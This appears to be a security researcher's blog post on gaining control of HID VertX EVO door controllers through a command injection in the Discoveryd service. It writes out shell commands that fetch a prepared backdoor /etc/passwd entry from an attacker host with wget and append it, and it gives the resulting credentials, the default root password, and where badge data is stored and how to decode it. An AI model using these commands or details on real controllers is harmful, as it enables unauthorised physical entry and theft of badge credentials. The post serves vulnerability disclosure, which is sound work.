This post is mostly an expansion on my last post. I recently got my hands on a VertX EVO V2000 and a V1000, in addition to the Edge EVO EH400’s. I’ve only owned them for ~24 hours so I haven’t had tons of time to dig deep, but I have had a chance to test the previous exploit and make the necessary changes in order to achieve the same goal.
If you haven’t read the last post the tl;dr is: Leveraging the Discoveryd vulnerability disclosed by @HeadlessZeke, it is possible to modify the password for the EH400 door controller’s web service. With access to the web service, it is possible to lock and unlock doors attached to the door controller with ease.
The first thing I noticed with both the VertX controllers is that they use a different method of authentication then the EH400 for the web service. The EH400 used lighttpd with htdigest authentication (.htpasswd). The VertX controllers both used a boa webserver with system level authentication (/etc/passwd). As long as the user was a member of the ‘axadmin’ group, they could log in to the web service. By default, the ‘admin’ user was a member of the ‘axadmin’ group. Additionally, on the V2000, the ‘root’ user was also a member of that group. As noted in the last post, the default password for root is ‘pass’, which is also true for the VertX controllers.
For the EH400’s, I exploited the Discoveryd vuln to backup then replace the .htpasswd file with a known password value to gain access to the web service. For the VertX controllers, instead, I simply need to add a new user. Due to the character length limit (among other things. I’m also assuming the character limit exists, I haven’t tested it against the VertX controllers yet), I can’t use the adduser command. What I chose to do was create an /etc/passwd entry separately (hardcoded into the exploit). Using the command injection, we wget a tmp file containing our backdoor user, then cat it into /etc/passwd with the proper group permissions.
echo 'z:$1$.hpbaOY9sKSvVyW6rVvh8.:503:500:Linux User,,,:/home/z:/bin/sh' > /var/www/html/z
wget -O /tmp/z http://'${LHOST}/z
cat /tmp/z >> /etc/passwd
As simple as that, and now we’re opening doors. (username ‘z’ password ‘backdoor’) I’ve pushed new scripts to Concierge for the VertX controllers.
One other thing of note. I recently discovered the presence of the “IdentDB” file in /mnt/apps/data/config/ on the all the door controllers(Edge EVO and VertX EVO). This file contains stored badge information. I think the purpose of this file is to allow for access in the case the access server or networking are down.
Above is some of the information I pulled from the used VertX1000 I purchased on eBay. The badges are on the left with, what I believe to be privilege information towards the right. I haven’t taken the chance to really dive into this, but I can confirm that these are indeed badges in hex. Using a badge calculator, you can determine the facility code and the ID number fairly easily. (As a note: the badges ending in 023 above seem a little odd and might not be actual RFID badges, but the others most certainly are. It’s possible they are pin numbers, or mag-stripe badges, or something.)
I’ll keep posting as I keep finding things of worth, assuming that happens.